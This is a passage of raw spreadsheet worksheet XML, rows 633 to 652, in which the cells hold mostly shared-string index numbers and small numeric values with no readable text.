      <c r="U633" s="12" t="s">
        <v>4834</v>
      </c>
      <c r="V633" s="12" t="s">
        <v>608</v>
      </c>
      <c r="W633" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X633" s="12">
        <v>0</v>
      </c>
      <c r="Y633" s="12" t="s">
        <v>4835</v>
      </c>
    </row>
    <row r="634" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A634" s="12">
        <v>2880</v>
      </c>
      <c r="B634" s="12" t="s">
        <v>28259</v>
      </c>
      <c r="C634" s="12" t="s">
        <v>28880</v>
      </c>
      <c r="D634" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F634" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G634" s="12" t="s">
        <v>4842</v>
      </c>
      <c r="H634" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I634" s="12" t="s">
        <v>35</v>
      </c>
      <c r="J634" s="12" t="s">
        <v>2023</v>
      </c>
      <c r="K634" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L634" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M634" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N634" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O634" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P634" s="12" t="s">
        <v>4843</v>
      </c>
      <c r="Q634" s="12">
        <v>2.6</v>
      </c>
      <c r="R634" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S634" s="12" t="s">
        <v>4844</v>
      </c>
      <c r="T634" s="12" t="s">
        <v>4845</v>
      </c>
      <c r="U634" s="12" t="s">
        <v>4846</v>
      </c>
      <c r="V634" s="12" t="s">
        <v>4847</v>
      </c>
      <c r="W634" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X634" s="12">
        <v>1</v>
      </c>
      <c r="Y634" s="12" t="s">
        <v>4848</v>
      </c>
    </row>
    <row r="635" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A635" s="12">
        <v>2882</v>
      </c>
      <c r="B635" s="12" t="s">
        <v>28881</v>
      </c>
      <c r="C635" s="12" t="s">
        <v>29781</v>
      </c>
      <c r="D635" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F635" s="12" t="s">
        <v>28883</v>
      </c>
      <c r="G635" s="12" t="s">
        <v>4849</v>
      </c>
      <c r="H635" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I635" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J635" s="12" t="s">
        <v>1203</v>
      </c>
      <c r="K635" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L635" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M635" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N635" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O635" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P635" s="12" t="s">
        <v>4850</v>
      </c>
      <c r="Q635" s="12">
        <v>2.6</v>
      </c>
      <c r="R635" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S635" s="12" t="s">
        <v>4851</v>
      </c>
      <c r="T635" s="12" t="s">
        <v>4152</v>
      </c>
      <c r="U635" s="12" t="s">
        <v>4852</v>
      </c>
      <c r="V635" s="12" t="s">
        <v>4176</v>
      </c>
      <c r="W635" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X635" s="12">
        <v>4</v>
      </c>
      <c r="Y635" s="12" t="s">
        <v>4853</v>
      </c>
    </row>
    <row r="636" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A636" s="12">
        <v>2886</v>
      </c>
      <c r="B636" s="12" t="s">
        <v>28884</v>
      </c>
      <c r="D636" s="12" t="s">
        <v>28885</v>
      </c>
      <c r="E636" s="12" t="s">
        <v>31471</v>
      </c>
      <c r="F636" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G636" s="12" t="s">
        <v>4859</v>
      </c>
      <c r="H636" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I636" s="12" t="s">
        <v>1460</v>
      </c>
      <c r="J636" s="12" t="s">
        <v>28</v>
      </c>
      <c r="K636" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L636" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M636" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N636" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O636" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P636" s="12" t="s">
        <v>3435</v>
      </c>
      <c r="Q636" s="12">
        <v>2.6</v>
      </c>
      <c r="R636" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S636" s="12" t="s">
        <v>4860</v>
      </c>
      <c r="T636" s="12" t="s">
        <v>4152</v>
      </c>
      <c r="U636" s="12" t="s">
        <v>4861</v>
      </c>
      <c r="V636" s="12" t="s">
        <v>48</v>
      </c>
      <c r="W636" s="12">
        <v>2940</v>
      </c>
      <c r="X636" s="12">
        <v>20</v>
      </c>
      <c r="Y636" s="12" t="s">
        <v>4862</v>
      </c>
    </row>
    <row r="637" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A637" s="12">
        <v>2894</v>
      </c>
      <c r="B637" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D637" s="18" t="s">
        <v>28349</v>
      </c>
      <c r="E637" s="18" t="s">
        <v>31428</v>
      </c>
      <c r="F637" s="12" t="s">
        <v>28886</v>
      </c>
      <c r="G637" s="12" t="s">
        <v>4863</v>
      </c>
      <c r="H637" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I637" s="12" t="s">
        <v>35</v>
      </c>
      <c r="J637" s="12" t="s">
        <v>277</v>
      </c>
      <c r="K637" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L637" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M637" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N637" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O637" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P637" s="12" t="s">
        <v>4324</v>
      </c>
      <c r="Q637" s="12">
        <v>2.6</v>
      </c>
      <c r="R637" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S637" s="12" t="s">
        <v>4864</v>
      </c>
      <c r="T637" s="12" t="s">
        <v>4865</v>
      </c>
      <c r="U637" s="12" t="s">
        <v>4866</v>
      </c>
      <c r="V637" s="12" t="s">
        <v>93</v>
      </c>
      <c r="W637" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X637" s="12">
        <v>6</v>
      </c>
      <c r="Y637" s="12" t="s">
        <v>4867</v>
      </c>
    </row>
    <row r="638" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A638" s="12">
        <v>2920</v>
      </c>
      <c r="B638" s="12" t="s">
        <v>28377</v>
      </c>
      <c r="D638" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F638" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G638" s="12" t="s">
        <v>4886</v>
      </c>
      <c r="H638" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I638" s="12" t="s">
        <v>28</v>
      </c>
      <c r="J638" s="12" t="s">
        <v>124</v>
      </c>
      <c r="K638" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L638" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M638" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N638" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O638" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P638" s="12" t="s">
        <v>4324</v>
      </c>
      <c r="Q638" s="12">
        <v>2.6</v>
      </c>
      <c r="R638" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S638" s="12" t="s">
        <v>4887</v>
      </c>
      <c r="T638" s="12" t="s">
        <v>4888</v>
      </c>
      <c r="U638" s="12" t="s">
        <v>4889</v>
      </c>
      <c r="V638" s="12" t="s">
        <v>1653</v>
      </c>
      <c r="W638" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X638" s="12">
        <v>8</v>
      </c>
      <c r="Y638" s="12" t="s">
        <v>4890</v>
      </c>
    </row>
    <row r="639" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A639" s="12">
        <v>2922</v>
      </c>
      <c r="B639" s="12" t="s">
        <v>28390</v>
      </c>
      <c r="C639" s="12" t="s">
        <v>28887</v>
      </c>
      <c r="D639" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F639" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G639" s="12" t="s">
        <v>4891</v>
      </c>
      <c r="H639" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I639" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J639" s="12" t="s">
        <v>744</v>
      </c>
      <c r="K639" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L639" s="12" t="s">
        <v>53</v>
      </c>
      <c r="M639" s="12" t="s">
        <v>31583</v>
      </c>
      <c r="N639" s="12" t="s">
        <v>31596</v>
      </c>
      <c r="O639" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P639" s="12" t="s">
        <v>4324</v>
      </c>
      <c r="Q639" s="12">
        <v>2.6</v>
      </c>
      <c r="R639" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S639" s="12" t="s">
        <v>4892</v>
      </c>
      <c r="T639" s="12" t="s">
        <v>4893</v>
      </c>
      <c r="U639" s="12" t="s">
        <v>2859</v>
      </c>
      <c r="V639" s="12" t="s">
        <v>2864</v>
      </c>
      <c r="W639" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X639" s="12">
        <v>10</v>
      </c>
      <c r="Y639" s="12" t="s">
        <v>4894</v>
      </c>
    </row>
    <row r="640" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A640" s="12">
        <v>2929</v>
      </c>
      <c r="B640" s="12" t="s">
        <v>28888</v>
      </c>
      <c r="D640" s="12" t="s">
        <v>28886</v>
      </c>
      <c r="F640" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G640" s="12" t="s">
        <v>4899</v>
      </c>
      <c r="H640" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I640" s="12" t="s">
        <v>35</v>
      </c>
      <c r="J640" s="12" t="s">
        <v>2023</v>
      </c>
      <c r="K640" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L640" s="12" t="s">
        <v>53</v>
      </c>
      <c r="M640" s="12" t="s">
        <v>31583</v>
      </c>
      <c r="N640" s="12" t="s">
        <v>31596</v>
      </c>
      <c r="O640" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P640" s="12" t="s">
        <v>3435</v>
      </c>
      <c r="Q640" s="12">
        <v>2.6</v>
      </c>
      <c r="R640" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S640" s="12" t="s">
        <v>4900</v>
      </c>
      <c r="T640" s="12" t="s">
        <v>2213</v>
      </c>
      <c r="U640" s="12" t="s">
        <v>4901</v>
      </c>
      <c r="V640" s="12" t="s">
        <v>4847</v>
      </c>
      <c r="W640" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X640" s="12">
        <v>4</v>
      </c>
      <c r="Y640" s="12" t="s">
        <v>4902</v>
      </c>
    </row>
    <row r="641" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A641" s="12">
        <v>2937</v>
      </c>
      <c r="B641" s="12" t="s">
        <v>28390</v>
      </c>
      <c r="C641" s="12" t="s">
        <v>28466</v>
      </c>
      <c r="D641" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F641" s="12" t="s">
        <v>28889</v>
      </c>
      <c r="G641" s="12" t="s">
        <v>4903</v>
      </c>
      <c r="H641" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I641" s="12" t="s">
        <v>27</v>
      </c>
      <c r="J641" s="12" t="s">
        <v>1437</v>
      </c>
      <c r="K641" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L641" s="12" t="s">
        <v>53</v>
      </c>
      <c r="M641" s="12" t="s">
        <v>31583</v>
      </c>
      <c r="N641" s="12" t="s">
        <v>31596</v>
      </c>
      <c r="O641" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P641" s="12" t="s">
        <v>4324</v>
      </c>
      <c r="Q641" s="12">
        <v>2.6</v>
      </c>
      <c r="R641" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S641" s="12" t="s">
        <v>4904</v>
      </c>
      <c r="T641" s="12" t="s">
        <v>4905</v>
      </c>
      <c r="U641" s="12" t="s">
        <v>4906</v>
      </c>
      <c r="V641" s="12" t="s">
        <v>608</v>
      </c>
      <c r="W641" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X641" s="12">
        <v>22</v>
      </c>
      <c r="Y641" s="12" t="s">
        <v>4907</v>
      </c>
    </row>
    <row r="642" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A642" s="12">
        <v>2939</v>
      </c>
      <c r="B642" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D642" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E642" s="12" t="s">
        <v>31442</v>
      </c>
      <c r="F642" s="12" t="s">
        <v>28886</v>
      </c>
      <c r="G642" s="12" t="s">
        <v>4908</v>
      </c>
      <c r="H642" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I642" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J642" s="12" t="s">
        <v>363</v>
      </c>
      <c r="K642" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L642" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M642" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N642" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O642" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P642" s="12" t="s">
        <v>4909</v>
      </c>
      <c r="Q642" s="12">
        <v>2.6</v>
      </c>
      <c r="R642" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S642" s="12" t="s">
        <v>4910</v>
      </c>
      <c r="T642" s="12" t="s">
        <v>3876</v>
      </c>
      <c r="U642" s="12" t="s">
        <v>4911</v>
      </c>
      <c r="V642" s="12" t="s">
        <v>411</v>
      </c>
      <c r="W642" s="12">
        <v>2921</v>
      </c>
      <c r="X642" s="12">
        <v>8</v>
      </c>
      <c r="Y642" s="12" t="s">
        <v>4912</v>
      </c>
    </row>
    <row r="643" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A643" s="12">
        <v>2941</v>
      </c>
      <c r="B643" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D643" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E643" s="12" t="s">
        <v>31451</v>
      </c>
      <c r="F643" s="12" t="s">
        <v>28878</v>
      </c>
      <c r="G643" s="12" t="s">
        <v>4913</v>
      </c>
      <c r="H643" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I643" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J643" s="12" t="s">
        <v>2609</v>
      </c>
      <c r="K643" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L643" s="12" t="s">
        <v>53</v>
      </c>
      <c r="M643" s="12" t="s">
        <v>31583</v>
      </c>
      <c r="N643" s="12" t="s">
        <v>31596</v>
      </c>
      <c r="O643" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P643" s="12" t="s">
        <v>4914</v>
      </c>
      <c r="Q643" s="12">
        <v>2.6</v>
      </c>
      <c r="R643" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S643" s="12" t="s">
        <v>4915</v>
      </c>
      <c r="T643" s="12" t="s">
        <v>4916</v>
      </c>
      <c r="U643" s="12" t="s">
        <v>4917</v>
      </c>
      <c r="V643" s="12" t="s">
        <v>57</v>
      </c>
      <c r="W643" s="12" t="s">
        <v>4918</v>
      </c>
      <c r="X643" s="12">
        <v>15</v>
      </c>
      <c r="Y643" s="12" t="s">
        <v>4919</v>
      </c>
    </row>
    <row r="644" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A644" s="12">
        <v>2944</v>
      </c>
      <c r="B644" s="12" t="s">
        <v>28890</v>
      </c>
      <c r="D644" s="12" t="s">
        <v>28891</v>
      </c>
      <c r="E644" s="12" t="s">
        <v>31439</v>
      </c>
      <c r="F644" s="12" t="s">
        <v>28892</v>
      </c>
      <c r="G644" s="12" t="s">
        <v>4921</v>
      </c>
      <c r="H644" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I644" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J644" s="12" t="s">
        <v>356</v>
      </c>
      <c r="K644" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L644" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M644" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N644" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O644" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P644" s="12" t="s">
        <v>4324</v>
      </c>
      <c r="Q644" s="12">
        <v>2.6</v>
      </c>
      <c r="R644" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S644" s="12" t="s">
        <v>4922</v>
      </c>
      <c r="T644" s="12" t="s">
        <v>4923</v>
      </c>
      <c r="U644" s="12" t="s">
        <v>4924</v>
      </c>
      <c r="V644" s="12" t="s">
        <v>4925</v>
      </c>
      <c r="W644" s="12">
        <v>4501</v>
      </c>
      <c r="X644" s="12">
        <v>39</v>
      </c>
      <c r="Y644" s="12" t="s">
        <v>4926</v>
      </c>
    </row>
    <row r="645" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A645" s="12">
        <v>2951</v>
      </c>
      <c r="B645" s="12" t="s">
        <v>28893</v>
      </c>
      <c r="D645" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F645" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G645" s="12" t="s">
        <v>4931</v>
      </c>
      <c r="H645" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I645" s="12" t="s">
        <v>13</v>
      </c>
      <c r="J645" s="12" t="s">
        <v>14</v>
      </c>
      <c r="K645" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L645" s="12" t="s">
        <v>53</v>
      </c>
      <c r="M645" s="12" t="s">
        <v>31583</v>
      </c>
      <c r="N645" s="12" t="s">
        <v>31596</v>
      </c>
      <c r="O645" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P645" s="12" t="s">
        <v>4932</v>
      </c>
      <c r="Q645" s="12">
        <v>2.4</v>
      </c>
      <c r="R645" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S645" s="12" t="s">
        <v>4933</v>
      </c>
      <c r="T645" s="12" t="s">
        <v>4934</v>
      </c>
      <c r="U645" s="12" t="s">
        <v>4935</v>
      </c>
      <c r="V645" s="12" t="s">
        <v>4936</v>
      </c>
      <c r="W645" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X645" s="12">
        <v>16</v>
      </c>
      <c r="Y645" s="12" t="s">
        <v>4937</v>
      </c>
    </row>
    <row r="646" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A646" s="12">
        <v>2955</v>
      </c>
      <c r="B646" s="12" t="s">
        <v>29785</v>
      </c>
      <c r="C646" s="12" t="s">
        <v>29781</v>
      </c>
      <c r="D646" s="12" t="s">
        <v>28894</v>
      </c>
      <c r="F646" s="12" t="s">
        <v>28895</v>
      </c>
      <c r="G646" s="12" t="s">
        <v>4938</v>
      </c>
      <c r="H646" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I646" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J646" s="12" t="s">
        <v>422</v>
      </c>
      <c r="K646" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L646" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M646" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N646" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O646" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P646" s="12" t="s">
        <v>4939</v>
      </c>
      <c r="Q646" s="12">
        <v>2.6</v>
      </c>
      <c r="R646" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S646" s="12" t="s">
        <v>4940</v>
      </c>
      <c r="T646" s="12" t="s">
        <v>4941</v>
      </c>
      <c r="U646" s="12" t="s">
        <v>4942</v>
      </c>
      <c r="V646" s="12" t="s">
        <v>4941</v>
      </c>
      <c r="W646" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X646" s="12">
        <v>3</v>
      </c>
      <c r="Y646" s="12" t="s">
        <v>4943</v>
      </c>
    </row>
    <row r="647" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A647" s="12">
        <v>2959</v>
      </c>
      <c r="B647" s="12" t="s">
        <v>28896</v>
      </c>
      <c r="C647" s="12" t="s">
        <v>28887</v>
      </c>
      <c r="D647" s="12" t="s">
        <v>28897</v>
      </c>
      <c r="F647" s="12" t="s">
        <v>28898</v>
      </c>
      <c r="G647" s="12" t="s">
        <v>4944</v>
      </c>
      <c r="H647" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I647" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J647" s="12" t="s">
        <v>44</v>
      </c>
      <c r="K647" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L647" s="12" t="s">
        <v>53</v>
      </c>
      <c r="M647" s="12" t="s">
        <v>31583</v>
      </c>
      <c r="N647" s="12" t="s">
        <v>31596</v>
      </c>
      <c r="O647" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P647" s="12" t="s">
        <v>4945</v>
      </c>
      <c r="Q647" s="12">
        <v>2.6</v>
      </c>
      <c r="R647" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S647" s="12" t="s">
        <v>4946</v>
      </c>
      <c r="T647" s="12" t="s">
        <v>4947</v>
      </c>
      <c r="U647" s="12" t="s">
        <v>4948</v>
      </c>
      <c r="V647" s="12" t="s">
        <v>48</v>
      </c>
      <c r="W647" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X647" s="12">
        <v>13</v>
      </c>
      <c r="Y647" s="12" t="s">
        <v>4949</v>
      </c>
    </row>
    <row r="648" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A648" s="12">
        <v>2960</v>
      </c>
      <c r="B648" s="12" t="s">
        <v>28353</v>
      </c>
      <c r="D648" s="12" t="s">
        <v>28346</v>
      </c>
      <c r="F648" s="12" t="s">
        <v>29763</v>
      </c>
      <c r="G648" s="12" t="s">
        <v>4950</v>
      </c>
      <c r="H648" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I648" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J648" s="12" t="s">
        <v>65</v>
      </c>
      <c r="K648" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L648" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M648" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N648" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O648" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P648" s="12" t="s">
        <v>4324</v>
      </c>
      <c r="Q648" s="12">
        <v>2.6</v>
      </c>
      <c r="R648" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S648" s="12" t="s">
        <v>4951</v>
      </c>
      <c r="T648" s="12" t="s">
        <v>4952</v>
      </c>
      <c r="U648" s="12" t="s">
        <v>4953</v>
      </c>
      <c r="V648" s="12" t="s">
        <v>70</v>
      </c>
      <c r="W648" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X648" s="12">
        <v>0</v>
      </c>
      <c r="Y648" s="12" t="s">
        <v>4954</v>
      </c>
    </row>
    <row r="649" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A649" s="12">
        <v>2962</v>
      </c>
      <c r="B649" s="12" t="s">
        <v>28888</v>
      </c>
      <c r="D649" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E649" s="12" t="s">
        <v>31439</v>
      </c>
      <c r="F649" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G649" s="12" t="s">
        <v>4959</v>
      </c>
      <c r="H649" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I649" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J649" s="12" t="s">
        <v>96</v>
      </c>
      <c r="K649" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L649" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M649" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N649" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O649" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P649" s="12" t="s">
        <v>4324</v>
      </c>
      <c r="Q649" s="12">
        <v>2.6</v>
      </c>
      <c r="R649" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S649" s="12" t="s">
        <v>4960</v>
      </c>
      <c r="T649" s="12" t="s">
        <v>4104</v>
      </c>
      <c r="U649" s="12" t="s">
        <v>4961</v>
      </c>
      <c r="V649" s="12" t="s">
        <v>400</v>
      </c>
      <c r="W649" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X649" s="12">
        <v>5</v>
      </c>
      <c r="Y649" s="12" t="s">
        <v>4962</v>
      </c>
    </row>
    <row r="650" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A650" s="12">
        <v>2966</v>
      </c>
      <c r="B650" s="12" t="s">
        <v>28259</v>
      </c>
      <c r="C650" s="12" t="s">
        <v>28260</v>
      </c>
      <c r="D650" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E650" s="12" t="s">
        <v>31439</v>
      </c>
      <c r="F650" s="12" t="s">
        <v>28899</v>
      </c>
      <c r="G650" s="12" t="s">
        <v>4963</v>
      </c>
      <c r="H650" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I650" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J650" s="12" t="s">
        <v>28</v>
      </c>
      <c r="K650" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L650" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M650" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N650" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O650" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P650" s="12" t="s">
        <v>3391</v>
      </c>
      <c r="Q650" s="12">
        <v>2.6</v>
      </c>
      <c r="R650" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S650" s="12" t="s">
        <v>4964</v>
      </c>
      <c r="T650" s="12" t="s">
        <v>4244</v>
      </c>
      <c r="U650" s="12" t="s">
        <v>4965</v>
      </c>
      <c r="V650" s="12" t="s">
        <v>2034</v>
      </c>
      <c r="W650" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X650" s="12">
        <v>10</v>
      </c>
      <c r="Y650" s="12" t="s">
        <v>4966</v>
      </c>
    </row>
    <row r="651" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A651" s="12">
        <v>2972</v>
      </c>
      <c r="B651" s="12" t="s">
        <v>28900</v>
      </c>
      <c r="C651" s="12" t="s">
        <v>28439</v>
      </c>
      <c r="D651" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F651" s="12" t="s">
        <v>28878</v>
      </c>
      <c r="G651" s="12" t="s">
        <v>4968</v>
      </c>
      <c r="H651" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I651" s="12" t="s">
        <v>35</v>
      </c>
      <c r="J651" s="12" t="s">
        <v>122</v>
      </c>
      <c r="K651" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L651" s="12" t="s">
        <v>53</v>
      </c>
      <c r="M651" s="12" t="s">
        <v>31583</v>
      </c>
      <c r="N651" s="12" t="s">
        <v>31596</v>
      </c>
      <c r="O651" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P651" s="12" t="s">
        <v>4969</v>
      </c>
      <c r="Q651" s="12">
        <v>2.6</v>
      </c>
      <c r="R651" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S651" s="12" t="s">
        <v>4970</v>
      </c>
      <c r="T651" s="12" t="s">
        <v>4971</v>
      </c>
      <c r="U651" s="12" t="s">
        <v>4972</v>
      </c>
      <c r="V651" s="12" t="s">
        <v>608</v>
      </c>
      <c r="W651" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X651" s="12">
        <v>4</v>
      </c>
      <c r="Y651" s="12" t="s">
        <v>4973</v>
      </c>
    </row>
    <row r="652" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A652" s="12">
        <v>2976</v>
      </c>
      <c r="B652" s="12" t="s">
        <v>28888</v>
      </c>
      <c r="D652" s="12" t="s">
        <v>28889</v>
      </c>
      <c r="E652" s="12" t="s">
        <v>31439</v>
      </c>
      <c r="F652" s="12" t="s">
        <v>28886</v>
      </c>
      <c r="G652" s="12" t="s">
        <v>4974</v>
      </c>
      <c r="H652" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I652" s="12" t="s">
        <v>22</v>
      </c>
      <c r="J652" s="12" t="s">
        <v>23</v>
      </c>
      <c r="K652" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L652" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M652" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N652" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O652" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P652" s="12" t="s">
        <v>4624</v>
      </c>
      <c r="Q652" s="12">
        <v>2.6</v>
      </c>
      <c r="R652" s="12" t="s">
        <v>17</v>
      </c>
